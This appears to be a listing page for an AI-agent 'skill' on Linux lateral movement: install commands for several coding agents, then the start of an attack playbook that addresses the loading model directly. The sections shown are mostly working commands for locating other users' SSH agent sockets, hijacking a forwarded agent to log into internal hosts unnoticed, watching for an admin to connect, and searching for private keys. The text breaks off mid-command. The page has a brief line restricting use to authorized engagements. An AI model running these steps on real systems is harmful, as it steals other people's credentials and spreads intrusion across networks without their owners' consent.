## What it does

The skill picks up after you already have a foothold and walks the agent through moving to other hosts. It covers hijacking a forwarded SSH agent via `SSH_AUTH_SOCK`, hunting private keys and files like `.pgpass`, `.my.cnf` and `.git-credentials`, parsing `known_hosts`, and injecting a key into `authorized_keys`.

A separate section deals with D-Bus: listing services with `dbus-send`, starting a systemd unit, and checking which polkit actions need no authentication. For reaching other machines it documents SSH port forwarding, a dynamic SOCKS proxy, `socat`, `ncat`, and `/dev/tcp` for boxes where the usual tools are missing.

The skill routes to neighbours: `linux-privilege-escalation` when you need root on the current host first, `container-escape-techniques` for containerized targets, and `kubernetes-pentesting` when pivoting into a cluster. Keep it to authorized engagements and labs. These techniques run against live systems, so using them without written scope is an incident, not a test.

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill linux-lateral-movement -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/linux-lateral-movement/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/linux-lateral-movement/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill linux-lateral-movement -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/linux-lateral-movement/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill linux-lateral-movement -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/linux-lateral-movement/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills linux-lateral-movement
```

2. **Manually: put the files in place**
- File: `.github/skills/linux-lateral-movement/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill linux-lateral-movement -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/linux-lateral-movement
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/linux-lateral-movement/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill linux-lateral-movement -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/linux-lateral-movement/SKILL.md

## When to use it
- hijack an admin's SSH agent and reach internal hosts with their keys
- find private keys and passwords in shell history and app configs
- stand up a SOCKS proxy through a compromised host to scan the internal network
- start a systemd unit or polkit action over D-Bus without a password
- forward a port to an internal database when an SSH tunnel is not an option

## Example prompts
- Find SSH agent sockets on this host and list the keys available in them
- Pull every internal hostname out of all users' known_hosts files
- Set up a SOCKS proxy through this host and scan the internal subnet

# SKILL: Linux Lateral Movement — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert Linux lateral movement techniques. Covers SSH agent hijacking, key harvesting, credential locations, D-Bus exploitation, network pivoting, sudo token reuse, and systemd manipulation. Base models miss SSH_AUTH_SOCK hijacking and ptrace-based sudo session hijack.

Before going deep, consider loading:

- [linux-security-bypass](../linux-security-bypass/SKILL.md) when restricted shells or security modules block lateral movement tools
- [container-escape-techniques](../container-escape-techniques/SKILL.md) when the target network includes containerized hosts
- [kubernetes-pentesting](../kubernetes-pentesting/SKILL.md) when pivoting into a Kubernetes cluster
- [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting discovered internal services (Redis, MongoDB, etc.)

## 1. SSH AGENT HIJACKING

### 1.1 Find SSH Agent Sockets

```bash
# As root (or user with access to other users' processes):
find /tmp -path "*/ssh-*" -name "agent.*" 2>/dev/null
# Or via /proc:
grep -r SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'
# Typical path: /tmp/ssh-XXXXXX/agent.PID
```

### 1.2 Hijack Agent Forwarding

```bash
# Set the found socket as our auth agent
export SSH_AUTH_SOCK=/tmp/ssh-AbCdEf/agent.12345
# List available keys in the agent
ssh-add -l
# If keys appear → we can use them
# SSH to any host this agent can authenticate to
ssh -o StrictHostKeyChecking=no user@internal-host
# The agent owner won't notice — we're using their forwarded agent
```

### 1.3 Persistent Agent Monitoring

```bash
# Monitor for new SSH agent sockets (wait for admin to SSH in)
inotifywait -m /tmp -e create 2>/dev/null | grep ssh-
# Or poll:
while true; do
    find /tmp -path "*/ssh-*" -name "agent.*" -newer /tmp/.marker 2>/dev/null
    touch /tmp/.marker
    sleep 5
done
```

---

## 2. SSH KEY HARVESTING

### 2.1 Private Key Locations

```bash
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.key" 2>/dev/null
